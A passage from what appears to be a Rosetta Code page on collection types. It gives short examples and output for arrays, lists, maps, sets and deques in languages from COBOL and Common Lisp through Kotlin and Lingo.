- Output: prompt$ cobc -xj collections.cob sample-table : abcd:1234 test:0000 wxyz:6789 sample-number(1): 1234 sample-record(2): test:0000 sample-number(3): 6789 sample-table : abcd:1234 test:0000 sample-number(3): 6789 prompt$ cobc -xj -debug collections.cob sample-table : abcd:1234 test:0000 wxyz:6789 sample-number(1): 1234 sample-record(2): test:0000 sample-number(3): 6789 sample-table : abcd:1234 test:0000 collections.cob: 33: libcob: Subscript of 'sample-number' out of bounds: 3 Common Lisp[edit] hashing[edit] CL-USER> (let ((list '()) (hash-table (make-hash-table))) (push 1 list) (push 2 list) (push 3 list) (format t "~S~%" (reverse list)) (setf (gethash 'foo hash-table) 42) (setf (gethash 'bar hash-table) 69) (maphash (lambda (key value) (format t "~S => ~S~%" key value)) hash-table) ;; or print the hash-table in readable form ;; (inplementation-dependent) (write hash-table :readably t) ;; or describe it (describe hash-table) ;; describe the list as well (describe list)) ;; FORMAT on a list (1 2 3) ;; FORMAT on a hash-table FOO => 42 BAR => 69 ;; WRITE :readably t on a hash-table #.(SB-IMPL::%STUFF-HASH-TABLE (MAKE-HASH-TABLE :TEST 'EQL :SIZE '16 :REHASH-SIZE '1.5 :REHASH-THRESHOLD '1.0 :WEAKNESS 'NIL) '((BAR . 69) (FOO . 42))) ;; DESCRIBE on a hash-table #<HASH-TABLE :TEST EQL :COUNT 2 {1002B6F391}> [hash-table] Occupancy: 0.1 Rehash-threshold: 1.0 Rehash-size: 1.5 Size: 16 Synchronized: no ;; DESCRIBE on a list (3 2 1) [list] ; No value deque[edit] In Lisp, a deque can be represented using two list variables which are understood to be opposite to each other. That is to say, the list links (cons cell cdr pointers) go inward into the deque from both ends. For instance the deque (1 2 3 4 5 6) can be represented using (1 2 3) and (6 5 4). Then, it is easy to push items on either end using ordinary list push operations. Popping is also simple, except when the case occurs that either piece runs out of items. 
A Lisp macro can be provided which takes care of this situation. The implementation below handles the underflow in one deque piece by transferring about one half of the elements from the opposite piece. This keeps the amortized cost for pushes and pops O(1), and prevents the degenerate behavior of bouncing all the elements from one side to the other when pops are requested which alternate between the two ends of the deque. ;;; Obtained from Usenet, ;;; Message-ID: <[email protected]m> ;;; Posting by Kaz Kylheku, February 28, 2008. (eval-when (:compile-toplevel :load-toplevel :execute) (defun bisect-list (list &optional (minimum-length 0)) (do ((double-skipper (cddr list) (cddr double-skipper)) (single-skipper list (cdr single-skipper)) (length 2 (+ length (if (cdr double-skipper) 2 1)))) ((null double-skipper) (cond ((< length minimum-length) (values list nil)) ((consp single-skipper) (multiple-value-prog1 (values list (cdr single-skipper)) (setf (cdr single-skipper) nil))) (t (values list nil)))))) (defun pop-deque-helper (facing-piece other-piece) (if (null facing-piece) (multiple-value-bind (head tail) (bisect-list other-piece 10) (let ((remaining (if tail head)) (moved (nreverse (or tail head)))) (values (first moved) (rest moved) remaining))) (values (first facing-piece) (rest facing-piece) other-piece)))) (defmacro pop-deque (facing-piece other-piece) (let ((result (gensym)) (new-facing (gensym)) (new-other (gensym))) `(multiple-value-bind (,result ,new-facing ,new-other) (pop-deque-helper ,facing-piece ,other-piece) (psetf ,facing-piece ,new-facing ,other-piece ,new-other) ,result))) Demo: [1]> (defvar *front* nil) *FRONT* [2]> (defvar *back* nil) *BACK* [3]> (push 1 *front*) (1) [4]> (push 2 *front*) (2 1) [5]> (push 5 *back*) (5) [6]> (push 6 *back*) (6 5) [7]> (append *front* (reverse *back*)) ;; display the deque! (2 1 5 6) [8]> (pop-deque *front* *back*) 2 [9]> (append *front* (reverse *back*)) ;; display the deque! 
(1 5 6) [10]> (pop-deque *back* *front*) 6 [11]> (append *front* (reverse *back*)) ;; display the deque! (1 5) [12]> (pop-deque *back* *front*) 5 [13]> (append *front* (reverse *back*)) ;; display the deque! (1) [14]> *front* (1) [15]> *back* NIL [16]> (pop-deque *back* *front*) 1 [17]> *front* NIL [18]> *back* NIL D[edit] D has static arrays. int[3] array; array[0] = 5; // array.length = 4; // compile-time error D has dynamic arrays. int[] array; array ~= 5; // append 5 array.length = 3; array[3] = 17; // runtime error: out of bounds. check removed in release mode. array = [2, 17, 3]; writefln(array.sort); // 2, 3, 17 D has associative arrays. int[int] array; // array ~= 5; // it doesn't work that way! array[5] = 17; array[6] = 20; // prints "[5, 6]" -> "[17, 20]" - although the order is not specified. writefln(array.keys, " -> ", array.values); assert(5 in array); // returns a pointer, by the way if (auto ptr = 6 in array) writefln(*ptr); // 20 E[edit] E has both mutable and immutable builtin collections; the common types are list (array), map (hash table), and set (hash table). This interactive session shows mutable lists and immutable collections of all three types. See also Arrays#E. ? def constList := [1,2,3,4,5] # value: [1, 2, 3, 4, 5] ? constList.with(6) # value: [1, 2, 3, 4, 5, 6] ? def flexList := constList.diverge() # value: [1, 2, 3, 4, 5].diverge() ? flexList.push(6) ? flexList # value: [1, 2, 3, 4, 5, 6].diverge() ? constList # value: [1, 2, 3, 4, 5] ? def constMap := [1 => 2, 3 => 4] # value: [1 => 2, 3 => 4] ? constMap[1] # value: 2 ? def constSet := [1, 2, 3, 2].asSet() # value: [1, 2, 3].asSet() ? constSet.contains(3) # value: true EchoLisp[edit] The collection will be a list, which is not unusual in EchoLisp. We add items - symbols - to the collection, and save it to local storage. (define my-collection ' ( 🌱 ☀️ ☔️ )) (set! my-collection (cons '🎥 my-collection)) (set! 
my-collection (cons '🐧 my-collection)) my-collection → (🐧 🎥 🌱 ☀️ ☔️) ;; save it (local-put 'my-collection) → my-collection Elena[edit] ELENA 3.4: Arrays[edit] // Constant array var intArray := (1, 2, 3, 4, 5). // Generic array var stringArr := Array new:5. stringArr[0] := "string". // Typified array Array<literal> arr := V<literal>(5). arr[0] := "a". arr[1] := "b". ArrayList and List[edit] //Create and initialize ArrayList var myAl := system'collections'ArrayList new; append:"Hello"; append:"World"; append:"!". //Create and initialize List var myList := system'collections'List new; append:"Hello"; append:"World"; append:"!". Dictionary[edit] //Create a dictionary var dict := system'collections'Dictionary new. dict["Hello"] := "World". dict["Key"] := "Value". Elixir[edit] Elixir data types are immutable: operations never modify existing data in place, they return new data instead. Indexes start from zero (unlike Erlang, where they start from one). List[edit] Elixir uses square brackets to specify a list of values. Values can be of any type: empty_list = [] list = [1,2,3,4,5] length(list) #=> 5 [0 | list] #=> [0,1,2,3,4,5] hd(list) #=> 1 tl(list) #=> [2,3,4,5] Enum.at(list,3) #=> 4 list ++ [6,7] #=> [1,2,3,4,5,6,7] list -- [4,2] #=> [1,3,5] Tuple[edit] Elixir uses curly brackets to define tuples. Like lists, tuples can hold any value. Tuples store elements contiguously in memory, so accessing a tuple element by index or getting the tuple size is a fast operation: empty_tuple = {} #=> {} tuple = {0,1,2,3,4} #=> {0, 1, 2, 3, 4} tuple_size(tuple) #=> 5 elem(tuple, 2) #=> 2 put_elem(tuple,3,:atom) #=> {0, 1, 2, :atom, 4} Keyword lists[edit] In Elixir, when we have a list of tuples and the first item of the tuple (i.e.
the key) is an atom, we call it a keyword list: list = [{:a,1},{:b,2}] #=> [a: 1, b: 2] list == [a: 1, b: 2] #=> true list[:a] #=> 1 list ++ [c: 3, a: 5] #=> [a: 1, b: 2, c: 3, a: 5] Keyword lists are important because they have two special characteristics: - They keep the keys ordered, as specified by the developer. - They allow a key to be given more than once. Map[edit] Whenever you need a key-value store, maps are the “go to” data structure in Elixir. Compared to keyword lists, we can already see two differences: - Maps allow any value as a key. - Maps' keys do not follow any ordering. empty_map = Map.new #=> %{} kwlist = [x: 1, y: 2] # Key Word List Map.new(kwlist) #=> %{x: 1, y: 2} Map.new([{1,"A"}, {2,"B"}]) #=> %{1 => "A", 2 => "B"} map = %{:a => 1, 2 => :b} #=> %{2 => :b, :a => 1} map[:a] #=> 1 map[2] #=> :b # If you pass duplicate keys when creating a map, the last one wins: %{1 => 1, 1 => 2} #=> %{1 => 2} # When all the keys in a map are atoms, you can use the keyword syntax for convenience: map = %{:a => 1, :b => 2} #=> %{a: 1, b: 2} map.a #=> 1 %{map | :a => 2} #=> %{a: 2, b: 2} # update syntax: existing keys only Set[edit] empty_set = MapSet.new #=> #MapSet<[]> set1 = MapSet.new(1..4) #=> #MapSet<[1, 2, 3, 4]> MapSet.size(set1) #=> 4 MapSet.member?(set1,3) #=> true MapSet.put(set1,9) #=> #MapSet<[1, 2, 3, 4, 9]> set2 = MapSet.new([6,4,2,0]) #=> #MapSet<[0, 2, 4, 6]> MapSet.union(set1,set2) #=> #MapSet<[0, 1, 2, 3, 4, 6]> MapSet.intersection(set1,set2) #=> #MapSet<[2, 4]> MapSet.difference(set1,set2) #=> #MapSet<[1, 3]> MapSet.subset?(set1,set2) #=> false Struct[edit] Structs are extensions built on top of maps that provide compile-time checks and default values.
defmodule User do defstruct name: "john", age: 27 end john = %User{} #=> %User{age: 27, name: "john"} john.name #=> "john" %User{age: age} = john # pattern matching age #=> 27 meg = %User{name: "meg"} #=> %User{age: 27, name: "meg"} is_map(meg) #=> true Fancy[edit] array[edit] # creating an empty array and adding values a = [] # => [] a[0]: 1 # => [1] a[3]: 2 # => [1, nil, nil, 2] # creating an array with the constructor a = Array new # => [] hash[edit] # creating an empty hash h = <[]> # => <[]> h["a"]: 1 # => <["a" => 1]> h["test"]: 2.4 # => <["a" => 1, "test" => 2.4]> h[3]: "Hello" # => <["a" => 1, "test" => 2.4, 3 => "Hello"]> # creating a hash with the constructor h = Hash new # => <[]> Forth[edit] Array[edit] include ffl/car.fs 10 car-create ar \ create a dynamic array with initial size 10 2 0 ar car-set \ ar[0] = 2 3 1 ar car-set \ ar[1] = 3 1 0 ar car-insert \ ar[0] = 1 ar[1] = 2 ar[2] = 3 Double linked list[edit] include ffl/dcl.fs dcl-create dl \ create a double linked list 3 dl dcl-append 1 dl dcl-prepend 2 1 dl dcl-insert \ dl[0] = 1 dl[1] = 2 dl[2] = 3 Hashtable[edit] include ffl/hct.fs 10 hct-create ht \ create a hashtable with initial size 10 1 s" one" ht hct-insert \ ht["one"] = 1 2 s" two" ht hct-insert \ ht["two"] = 2 3 s" three" ht hct-insert \ ht["three"] = 3 Fortran[edit] Standard[edit] The only facility for a collection more organised than a collection of separately-named variables (even if with a system for the names) is the array, which is a collection of items of identical type, indexed by an integer only, definitely not by a text as in say Snobol. Thus REAL A(36) !Declares a one-dimensional array A(1), A(2), ... A(36) A(1) = 1 !Assigns a value to the first element. A(2) = 3*A(1) + 5 !The second element gets 8. With F90 came a large expansion in the facilities for manipulating arrays. They can now have any lower bound, as in REAL A(-6:+12) and their size can be defined at run time, not just compile time.
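The run-time sizing just mentioned is done with ALLOCATABLE arrays; a minimal F90-style sketch (the size N here is illustrative, e.g. read from input):

```fortran
      REAL, ALLOCATABLE :: A(:)   !Declare a deferred-size array.
      N = 5                       !Size chosen at run time.
      ALLOCATE (A(N))             !Now A(1), A(2), ... A(N) exist.
      A = 0.0                     !Whole-array assignment fills every element.
      DEALLOCATE (A)              !Release the storage when done.
```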
Further, programmer-defined data aggregates can be defined via the TYPE statement, and arrays of such types can be manipulated. However, type-matching remains rigid: all elements of an array must be of the same type. So, TYPE MIXED !Name the "type". INTEGER COUNTER !Its content is listed. REAL WEIGHT,DEPTH CHARACTER*28 MARKNAME COMPLEX PATH(6) !The mixed collection includes an array. END TYPE MIXED TYPE(MIXED) TEMP,A(6) !Declare some items of that type. would define a collection of variables constituting a "type", then a simple variable TEMP whose parts would be accessed via the likes of TEMP.DEPTH or TEMP%DEPTH, and an array of such aggregates where A(3).PATH(1) = (2.7,3.1) assigns a complex number to the first step of the PATH of the third element of array A. The indexing must be associated with the item having an array aspect, but in PL/I A.PATH(3,1) - or other groupings - would be acceptable. There is a sense in which the CHARACTER type is flexible, in that multiple and different types can be represented as texts so that "Pi, 3.14159, 4*atan(1)" might be considered a collection of three items (yet be contained in one, possibly large variable) and be processed in various ways, or one might prepare a battery of variables and arrays referring to each other and disc files in such a way as to present a database containing a collection of information. Coarray[edit] Fortran normally uses only ( ) with no appeal to {[ ]} usage even for complex formulae. The co-array concept of the 1990s that was standardised in F2008 extends the syntax to use [k] to specify the k'th "image" executing in parallel. Loosely, if X is a variable, manipulated as in normal statements, a reference to X[3] would be to that X value held by the third running "image", while X would be in each image a reference to that image's own X value. In other words, there is a collection of X variables.
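That collection-of-X idea can be sketched as a tiny coarray program (untested here; it needs an F2008 coarray-capable compiler, e.g. gfortran with -fcoarray=lib, run with at least three images):

```fortran
      PROGRAM COADEMO
      INTEGER :: X[*]        !One X per image: a collection of X variables.
      X = THIS_IMAGE()       !Each image stores its own image number in its X.
      SYNC ALL               !Make every image's X visible to the others.
      IF (THIS_IMAGE() == 1) THEN
        PRINT *, 'Image 3 holds X =', X[3]   ![3] reads image 3's copy.
      END IF
      END PROGRAM COADEMO
```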
FreeBASIC[edit] Although it's possible to build any type of collection (vectors, linked lists, stacks, queues, hashtables etc.) using FreeBASIC's object oriented features, the only collection type which is built into the language is the array. This can be fixed size or dynamic, have arbitrary lower and upper bounds, have up to 8 dimensions and any kind of element type (including user defined types). Here are some simple examples: ' FB 1.05.0 Win64 'create fixed size array of integers Dim a(1 To 5) As Integer = {1, 2, 3, 4, 5} Print a(2), a(4) 'create empty dynamic array of doubles Dim b() As Double ' add two elements by first redimensioning the array to hold this number of elements Redim b(0 To 1) b(0) = 3.5 : b(1) = 7.1 Print b(0), b(1) 'create 2 dimensional fixed size array of bytes Dim c(1 To 2, 1 To 2) As Byte = {{1, 2}, {3, 4}} Print c(1, 1), c(2,2) Sleep - Output: 2 4 3.5 7.1 1 4 Gambas[edit] Click this link to run this code Public Sub Main() Dim siCount As Short Dim cCollection As Collection = ["0": "zero", "1": "one", "2": "two", "3": "three", "4": "four", "5": "five", "6": "six", "7": "seven", "8": "eight", "9": "nine"] For siCount = 0 To 9 Print cCollection[Str(siCount)] End Output: zero one two three four five six seven eight nine Go[edit] Built in, resizable[edit] - Slices - Maps Built in resizable collections are slices and maps. The value type for these collections can be any Go type, including interface. An empty interface can reference an object of any type, providing a kind of polymorphic collection. Here the variable a is a slice of interface{} objects. package main import "fmt" func main() { var a []interface{} a = append(a, 3) a = append(a, "apples", "oranges") fmt.Println(a) } - Output: [3 apples oranges] Built in, less conventional[edit] - Go has arrays that can be used as collections, but arrays are declared with constant size and cannot be resized. - Strings are a special case of slice. 
Strings are immutable and are handled specially in other ways. - A struct with a number of members might be considered a collection in some sense. - A buffered channel might be closer to the familiar concept of a collection, as it represents a FIFO queue. Buffered channels have a fixed size and cannot be resized after creation. Library[edit] - The container directory of the standard library has the packages heap, list, and ring. - Anything that implements bufio.ReadWriter can be used as a FIFO queue. This includes bytes.Buffer, which makes a useful in-memory collection. - The sort package also contains search functions which perform a binary search on a sorted collection. For these functions the collection implementation is abstracted through sort.Interface. It is typically a slice, but could be anything that is indexable with an integer index. Groovy[edit] Lists are just variable-length, integer-indexed arrays. def emptyList = [] assert emptyList.isEmpty() : "These are not the items you're looking for" assert emptyList.size() == 0 : "Empty list has size 0" assert ! 
emptyList : "Empty list evaluates as boolean 'false'" def initializedList = [ 1, "b", java.awt.Color.BLUE ] assert initializedList.size() == 3 assert initializedList : "Non-empty list evaluates as boolean 'true'" assert initializedList[2] == java.awt.Color.BLUE : "referencing a single element (zero-based indexing)" assert initializedList[-1] == java.awt.Color.BLUE : "referencing a single element (reverse indexing of last element)" def combinedList = initializedList + [ "more stuff", "even more stuff" ] assert combinedList.size() == 5 assert combinedList[1..3] == ["b", java.awt.Color.BLUE, "more stuff"] : "referencing a range of elements" combinedList << "even more stuff" assert combinedList.size() == 6 assert combinedList[-1..-3] == \ ["even more stuff", "even more stuff", "more stuff"] \ : "reverse referencing last 3 elements" println ([combinedList: combinedList]) - Output: [combinedList:[1, b, java.awt.Color[r=0,g=0,b=255], more stuff, even more stuff, even more stuff]] Maps are just variable-length, associative arrays. They are not necessarily order preserving. def emptyMap = [:] assert emptyMap.isEmpty() : "These are not the items you're looking for" assert emptyMap.size() == 0 : "Empty map has size 0" assert ! 
emptyMap : "Empty map evaluates as boolean 'false'" def initializedMap = [ count: 1, initial: "B", eyes: java.awt.Color.BLUE ] assert initializedMap.size() == 3 assert initializedMap : "Non-empty map evaluates as boolean 'true'" assert initializedMap["eyes"] == java.awt.Color.BLUE : "referencing a single element (array syntax)" assert initializedMap.eyes == java.awt.Color.BLUE : "referencing a single element (member syntax)" assert initializedMap.height == null : \ "references to non-existent keys generally evaluate to null (implementation dependent)" def combinedMap = initializedMap \ + [hair: java.awt.Color.BLACK, birthdate: Date.parse("yyyy-MM-dd", "1960-05-17") ] assert combinedMap.size() == 5 combinedMap["weight"] = 185 // array syntax combinedMap.lastName = "Smith" // member syntax combinedMap << [firstName: "Joe"] // entry syntax assert combinedMap.size() == 8 assert combinedMap.keySet().containsAll( ["lastName", "count", "eyes", "hair", "weight", "initial", "firstName", "birthdate"]) println ([combinedMap: combinedMap]) - Output: [combinedMap:[count:1, initial:B, eyes:java.awt.Color[r=0,g=0,b=255], hair:java.awt.Color[r=0,g=0,b=0], birthdate:Tue May 17 00:00:00 CDT 1960, weight:185, lastName:Smith, firstName:Joe]] Sets are unique, not indexed at all (contents can only be discovered by traversal), and are not necessarily order preserving. There is no particular special language support for denoting a Set, although a Set may be initialized from a List, and Sets share many of the same operations and methods that are available in Lists. def emptySet = new HashSet() assert emptySet.isEmpty() : "These are not the items you're looking for" assert emptySet.size() == 0 : "Empty set has size 0" assert !
emptySet : "Empty set evaluates as boolean 'false'" def initializedSet = new HashSet([ 1, "b", java.awt.Color.BLUE ]) assert initializedSet.size() == 3 assert initializedSet : "Non-empty set evaluates as boolean 'true'" //assert initializedSet[2] == java.awt.Color.BLUE // SYNTAX ERROR!!! No indexing of set elements! def combinedSet = initializedSet + new HashSet([ "more stuff", "even more stuff" ]) assert combinedSet.size() == 5 combinedSet << "even more stuff" assert combinedSet.size() == 5 : "No duplicate elements allowed!" println ([combinedSet: combinedSet]) - Output: [combinedSet:[1, java.awt.Color[r=0,g=0,b=255], b, even more stuff, more stuff]] Haskell[edit] Data.List[edit] The list is typically the first collection type to be encountered in textbooks, but other types may tend to be more efficient, or more flexibly accessed; see the Data hierarchy of GHC's standard library. New collection types may be defined with data. [1, 2, 3, 4, 5] To prepend a single element to a list, use the : operator: 1 : [2, 3, 4] To concatenate two lists, use ++: [1, 2] ++ [3, 4] To concatenate a whole list of lists, use concat: concat [[1, 2], [3, 4], [5, 6, 7]] Data.Array[edit] Faster retrieval by index: import Data.Array (Array, listArray, Ix, (!)) triples :: Array Int (Char, String, String) triples = listArray (0, 11) $ zip3 "鼠牛虎兔龍蛇馬羊猴鸡狗豬" -- 生肖 shengxiao – symbolic animals (words "shǔ niú hǔ tù lóng shé mǎ yáng hóu jī gǒu zhū") (words "rat ox tiger rabbit dragon snake horse goat monkey rooster dog pig") indexedItem :: Ix i => Array i (Char, String, String) -> i -> String indexedItem a n = let (c, w, w1) = a ! n in c : unwords ["\t", w, w1] main :: IO () main = (putStrLn .
unlines) $ indexedItem triples <$> [2, 4, 6] - Output: 虎 hǔ tiger 龍 lóng dragon 馬 mǎ horse Data.Map[edit] Flexible key-value indexing and efficient retrieval: import qualified Data.Map as M import Data.Maybe (isJust) mapSample :: M.Map String Int mapSample = M.fromList [ ("alpha", 1) , ("beta", 2) , ("gamma", 3) , ("delta", 4) , ("epsilon", 5) , ("zeta", 6) ] maybeValue :: String -> Maybe Int maybeValue = flip M.lookup mapSample main :: IO () main = print $ sequence $ filter isJust (maybeValue <$> ["beta", "delta", "zeta"]) - Output: Just [2,4,6] Data.Set[edit] Repertoire of efficient set operations: import qualified Data.Set as S setA :: S.Set String setA = S.fromList ["alpha", "beta", "gamma", "delta", "epsilon"] setB :: S.Set String setB = S.fromList ["delta", "epsilon", "zeta", "eta", "theta"] main :: IO () main = (print . S.toList) (S.intersection setA setB) - Output: ["delta","epsilon"] Icon and Unicon[edit] Icon and Unicon have a number of different types that could be considered collections. For more information see Introduction to Icon and Unicon on Rosetta - Data Types. 
Several data types could be considered collections: # Creation of collections: s := "abccd" # string, an ordered collection of characters, immutable c := 'abcd' # cset, an unordered collection of characters, immutable S := set() # set, an unordered collection of unique values, mutable, contents may be of any type T := table() # table, an associative array of values accessed via unordered keys, mutable, contents may be of any type L := [] # list, an ordered collection of values indexed by position 1..n or as stack/queue, mutable, contents may be of any type record constructorname(field1,field2,fieldetc) # record, a collection of values stored in named fields, mutable, contents may be of any type (declare outside procedures) R := constructorname() # record (creation) Adding to these collections can be accomplished as follows: s ||:= "xyz" # concatenation c ++:= 'xyz' # union insert(S,"abc") # insert T["abc"] := "xyz" # insert create/overwrite put(L,1) # put (extend), also push R.field1 := "xyz" # overwrite Additionally, the following operations apply: S := S ++ S2 # union of two sets or two csets S ++:= S2 # augmented assignment L := L ||| L2 # list concatenation L |||:= L2 # augmented assignment J[edit] J is an array-oriented language -- it treats all data as collections and processes collections natively. Its built in (primitive) functions are specifically designed to handle collections. J will, when possible without losing significance of the original value, implicitly convert values to a type which allows them represented in a homogeneous fashion in a collection. Heterogeneous collections are possible via "boxing" (analogous to a "variant" data type). c =: 0 10 20 30 40 NB. A collection c, 50 NB. Append 50 to the collection 0 10 20 30 40 50 _20 _10 , c NB. Prepend _20 _10 to the collection _20 _10 0 10 20 30 40 ,~ c NB. Self-append 0 10 20 30 40 0 10 20 30 40 ,:~ c NB. Duplicate 0 10 20 30 40 0 10 20 30 40 30 e. c NB. Is 30 in the collection? 1 30 i.~c NB. Where? 
3 30 80 e. c NB. Don't change anything to test multiple values -- collections are native. 1 0 2 1 4 2 { c NB. From the collection, give me items two, one, four, and two again. 20 10 40 20 |.c NB. Reverse the collection 40 30 20 10 0 1+c NB. Increment the collection 1 11 21 31 41 c%10 NB. Decimate the collection (divide by 10) 0 1 2 3 4 {. c NB. Give me the first item 0 {: c NB. And the last 40 3{.c NB. Give me the first 3 items 0 10 20 3}.c NB. Throw away the first 3 items 30 40 _3{.c NB. Give me the last 3 items 20 30 40 _3}.c NB. (Guess) 0 10 keys_map_ =: 'one';'two';'three' vals_map_ =: 'alpha';'beta';'gamma' lookup_map_ =: a:& $: : (dyad def ' (keys i. y) { vals,x')&boxopen exists_map_ =: verb def 'y e. keys'&boxopen exists_map_ 'bad key' 0 exists_map_ 'two';'bad key' 1 0 lookup_map_ 'one' +-----+ |alpha| +-----+ lookup_map_ 'three';'one';'two';'one' +-----+-----+----+-----+ |gamma|alpha|beta|alpha| +-----+-----+----+-----+ lookup_map_ 'bad key' ++ || ++ 'some other default' lookup_map_ 'bad key' +------------------+ |some other default| +------------------+ 'some other default' lookup_map_ 'two';'bad key' +----+------------------+ |beta|some other default| +----+------------------+ +/ c NB. Sum of collection 100 */ c NB. Product of collection 0 i.5 NB. Generate the first 5 nonnegative integers 0 1 2 3 4 10*i.5 NB. Looks familiar 0 10 20 30 40 c = 10*i.5 NB. Test each for equality 1 1 1 1 1 c -: 10*i.5 NB. Test for identicality 1 Java[edit] Native collection library[edit] When creating a List of any kind in Java (ArrayList or LinkedList), the type of the variable is a style choice. It is sometimes considered good practice to make the pointer of type List and the new object of a List subclass. Doing this ensures two things: if you later need a different kind of list, you only have to change one line and all of your methods will still work, and you will not be able to use any methods that are specific to the List implementation you chose.
So in this example, all instances of "ArrayList" can be changed to "LinkedList" and it will still work, but you will not be able to use a method like "ensureCapacity()" because the variable is of type List. List arrayList = new ArrayList(); arrayList.add(new Integer(0)); // alternative with primitive autoboxed to an Integer object automatically arrayList.add(0); //other features of ArrayList //define the type in the arraylist, you can substitute a proprietary class in the "<>" List<Integer> myarrlist = new ArrayList<Integer>(); //add several values to the arraylist to be summed later int sum = 0; for(int i = 0; i < 10; i++) { myarrlist.add(i); } //loop through myarrlist to sum each entry for(int i = 0; i < myarrlist.size(); i++) { sum += myarrlist.get(i); } or for(int i : myarrlist) { sum += i; } //remove the last entry in the ArrayList myarrlist.remove(myarrlist.size()-1); //clear the ArrayList myarrlist.clear(); Here is a reference table for characteristics of commonly used Collections classes: Using the Scala collection classes[edit] The Scala libraries are valid Java byte-code libraries. The collections part is rich because of the multiple inheritance of traits. E.g. an ArrayBuffer has properties inherited from 9 traits such as Buffer[A], IndexedSeqOptimized[A, ArrayBuffer[A]], Builder[A, ArrayBuffer[A]], ResizableArray[A] and Serializable. Another collection, e.g. TrieMap, uses some of these and other added traits. A TrieMap - a hash map - is the most advanced of all. It supports parallel processing without blocking. import scala.Tuple2; import scala.collection.concurrent.TrieMap; import scala.collection.immutable.HashSet; import scala.collection.mutable.ArrayBuffer; public class Collections { public static void main(String[] args) { ArrayBuffer<Integer> myarrlist = new ArrayBuffer<Integer>(); ArrayBuffer<Integer> myarrlist2 = new ArrayBuffer<Integer>(20); myarrlist.$plus$eq(new Integer(42)); // $plus$eq is Scala += operator myarrlist.$plus$eq(13); // to add an element.
myarrlist.$plus$eq(-1); myarrlist2 = (ArrayBuffer<Integer>) myarrlist2.$minus(-1); for (int i = 0; i < 10; i++) myarrlist2.$plus$eq(i); // loop through myarrlist to sum each entry int sum = 0; for (int i = 0; i < myarrlist2.size(); i++) { sum += myarrlist2.apply(i); } System.out.println("List is: " + myarrlist2 + " with head: " + myarrlist2.head() + " sum is: " + sum); System.out.println("Third element is: " + myarrlist2.apply$mcII$sp(2)); Tuple2<String, String> tuple = new Tuple2<String, String>("US", "Washington"); System.out.println("Tuple2 is : " + tuple); ArrayBuffer<Tuple2<String, String>> capList = new ArrayBuffer<Tuple2<String, String>>(); capList.$plus$eq(new Tuple2<String, String>("US", "Washington")); capList.$plus$eq(new Tuple2<String, String>("France", "Paris")); System.out.println(capList); TrieMap<String, String> trieMap = new TrieMap<String, String>(); trieMap.put("US", "Washington"); trieMap.put("France", "Paris"); HashSet<Character> set = new HashSet<Character>(); ArrayBuffer<Tuple2<String, String>> capBuffer = new ArrayBuffer<Tuple2<String, String>>(); trieMap.put("US", "Washington"); System.out.println(trieMap); } } JavaScript[edit] var array = []; array.push('abc'); array.push(123); array.push(new MyClass); console.log( array[2] ); var obj = {}; obj['foo'] = 'xyz'; //equivalent to: obj.foo = 'xyz'; obj['bar'] = new MyClass; //equivalent to: obj.bar = new MyClass; obj['1x; ~~:-b'] = 'text'; //no equivalent console.log(obj['1x; ~~:-b']); jq[edit] jq has three native collection types: JSON objects (implemented as hash tables over strings), arrays (with index origin equal to 0), and JSON strings. Since strings in jq can be thought of as arrays of codepoints, this article will focus on objects and arrays. Creation[edit] Collections can be created using JSON syntax (e.g. {"a":1}) or programmatically (e.g. {} | .a = 1). One of the programmatic approaches to creating JSON objects allows the key names to be specified as unquoted strings, e.g. 
{"a": 1} == {a: 1} evaluates to true. Variables can also be used, e.g. the object {"a":1} can also be created by the following pipeline: "a" as $key | 1 as $value | {($key): $value} Equality[edit] Two arrays are equal if and only if their lengths and respective elements are equal. Two objects are equal if and only if they have the same keys and if the values at corresponding keys are equal. Note that expressions with repeated keys are regarded as programmatic expressions: e.g. {"a":1, "a":2} is regarded as shorthand for {"a":1} + {"a":2}, which evaluates to {"a":2}. That is, {"a":1, "a":2} should be regarded as an expression that evaluates to a JSON object. Immutability[edit] Semantically, all jq data types are immutable, but it is often convenient to speak about modifying an element of a composite structure. For example, consider the following pipeline: [0,1,2] | .[0] = 10 The result (or output) of this sequence is [10,1,2], so it is convenient to speak of the operation ".[0] = 10" as simply a filter that sets the element at 0 to 10. Julia[edit] Julia has a wide variety of collections, including vectors, matrices, lists of Any data type, associative arrays, and bitsets. There is a slicing notation and list comprehensions similar to those in Python, but the base index is by default 1, not 0. In Julia, a collection is just a variable-length array: julia> collection = [] 0-element Array{Any,1} julia> push!(collection, 1,2,4,7) 4-element Array{Any,1}: 1 2 4 7 Kotlin[edit] Apart from arrays, whose length is fixed but whose content is mutable, Kotlin distinguishes between mutable and immutable collection types in its standard library. Examples of each are given below. Where possible, the type parameter(s) of generic collection types are inferred from the content.
In addition, Kotlin can also access other types of Java collection such as LinkedList, Queue, Deque and Stack by simply importing the appropriate type: import java.util.PriorityQueue fun main(args: Array<String>) { // generic array val ga = arrayOf(1, 2, 3) println(ga.joinToString(prefix = "[", postfix = "]")) // specialized array (one for each primitive type) val da = doubleArrayOf(4.0, 5.0, 6.0) println(da.joinToString(prefix = "[", postfix = "]")) // immutable list val li = listOf<Byte>(7, 8, 9) println(li) // mutable list val ml = mutableListOf<Short>() ml.add(10); ml.add(11); ml.add(12) println(ml) // immutable map val hm = mapOf('a' to 97, 'b' to 98, 'c' to 99) println(hm) // mutable map val mm = mutableMapOf<Char, Int>() mm.put('d', 100); mm.put('e', 101); mm.put('f', 102) println(mm) // immutable set (duplicates not allowed) val se = setOf(1, 2, 3) println(se) // mutable set (duplicates not allowed) val ms = mutableSetOf<Long>() ms.add(4L); ms.add(5L); ms.add(6L) println(ms) // priority queue (imported from Java) val pq = PriorityQueue<String>() pq.add("First"); pq.add("Second"); pq.add("Third") println(pq) } - Output: [1, 2, 3] [4.0, 5.0, 6.0] [7, 8, 9] [10, 11, 12] {a=97, b=98, c=99} {d=100, e=101, f=102} [1, 2, 3] [4, 5, 6] [First, Second, Third] Lingo[edit] Lingo has 2 collection types: lists (arrays) and property lists (hashes): -- list stuff l = [1, 2] l.add(3) l.add(4) put l -- [1, 2, 3, 4] -- property list stuff pl = [#foo: 1, #bar: 2] pl[#foobar] = 3 pl["barfoo"] = 4 put pl -- [#foo: 1, #bar: 2, #foobar: 3, "barfoo": 4] Lingo is not statically-typed, but if needed, a collection type that only accepts a specific data type can be created by sub-classing one of the 2 available collection types and overwriting its access methods, so that those block any data type other than the one that was passed to the constructor. 
